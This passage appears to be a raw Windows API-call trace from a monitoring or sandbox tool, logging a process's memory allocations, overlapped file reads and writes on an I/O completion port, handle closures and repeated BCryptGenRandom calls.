[0183.658] free (_Block=0x3e305b8) [0183.658] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.658] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.659] free (_Block=0x1fa91d0) [0183.659] free (_Block=0x1fa2ed8) [0183.659] free (_Block=0x1fa90b8) [0183.659] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0183.659] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.671] CloseHandle (hObject=0x3cc) returned 1 [0183.671] free (_Block=0x1ff1e60) [0183.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.685] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1b7f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0183.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.706] CloseHandle (hObject=0x2a8) returned 1 [0183.706] free (_Block=0x3f70048) [0183.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.713] CloseHandle (hObject=0x308) returned 1 [0183.713] free (_Block=0x3e70008) [0183.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.721] CloseHandle (hObject=0x3cc) returned 1 [0183.721] free (_Block=0x1ff1e60) [0183.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0183.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0183.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.733] free (_Block=0x3e305b8) [0183.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.733] free (_Block=0x1fa91d0) [0183.734] free (_Block=0x1fa2ed8) [0183.734] free (_Block=0x1fa90b8) [0183.734] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0183.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0183.734] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0183.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.518] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0184.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.527] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1f8f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0184.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.542] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0184.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.592] CloseHandle (hObject=0x170) returned 1 [0184.592] free (_Block=0x1ff1e60) [0184.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.601] CloseHandle (hObject=0x308) returned 1 [0184.601] free (_Block=0x3d70450) [0184.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.604] CloseHandle (hObject=0x3cc) returned 1 [0184.604] free (_Block=0x3f70048) [0184.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.605] CloseHandle (hObject=0x2a4) returned 1 [0184.605] free (_Block=0x3df0008) [0184.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0184.605] CloseHandle (hObject=0x2a8) returned 1 [0184.605] free (_Block=0x3e70008) [0184.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.518] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.518] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.518] free (_Block=0x3e305b8) [0185.518] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.518] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.518] free (_Block=0x1fa91d0) [0185.518] free (_Block=0x1fa2ed8) [0185.518] free (_Block=0x1fa90b8) [0185.518] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.527] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.527] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.527] free (_Block=0x3e305b8) [0185.527] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.527] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.528] free (_Block=0x1fa91d0) [0185.528] free (_Block=0x1fa2ed8) [0185.528] free (_Block=0x1fa90b8) [0185.528] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.533] CloseHandle (hObject=0x2a8) returned 1 [0185.533] free (_Block=0x1ff1e60) [0185.533] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.544] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.545] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.545] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.545] free (_Block=0x3e305b8) [0185.546] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.546] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.546] free (_Block=0x1fa91d0) [0185.546] free (_Block=0x1fa2ed8) [0185.546] free (_Block=0x1fa90b8) [0185.546] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.560] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.572] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.574] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.574] free (_Block=0x3e305b8) [0185.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.574] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.574] free (_Block=0x1fa91d0) [0185.574] free (_Block=0x1fa2ed8) [0185.574] free (_Block=0x1fa90b8) [0185.574] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0185.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.588] CloseHandle (hObject=0x2a8) returned 1 [0185.589] free (_Block=0x1ff1e60) [0185.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.593] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4abc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0185.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.873] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.882] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.883] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.883] free (_Block=0x3e305b8) [0185.883] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.883] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.883] free (_Block=0x1fa91d0) [0185.883] free (_Block=0x1fa2ed8) [0185.883] free (_Block=0x1fa90b8) [0185.883] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.891] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x109f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0185.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.901] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.901] free (_Block=0x3e305b8) [0185.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.901] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.901] free (_Block=0x1fa91d0) [0185.901] free (_Block=0x1fa2ed8) [0185.901] free (_Block=0x1fa90b8) [0185.901] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.909] CloseHandle (hObject=0x338) returned 1 [0185.910] free (_Block=0x3f70048) [0185.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0185.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0185.918] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.918] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.918] free (_Block=0x3e305b8) [0185.918] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.918] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.918] free (_Block=0x1fa91d0) [0185.919] free (_Block=0x1fa2ed8) [0185.919] free (_Block=0x1fa90b8) [0185.919] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.924] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0185.926] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x18c20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0185.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.479] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0187.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.501] CloseHandle (hObject=0x330) returned 1 [0187.501] free (_Block=0x1ff1e60) [0187.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.509] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0187.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 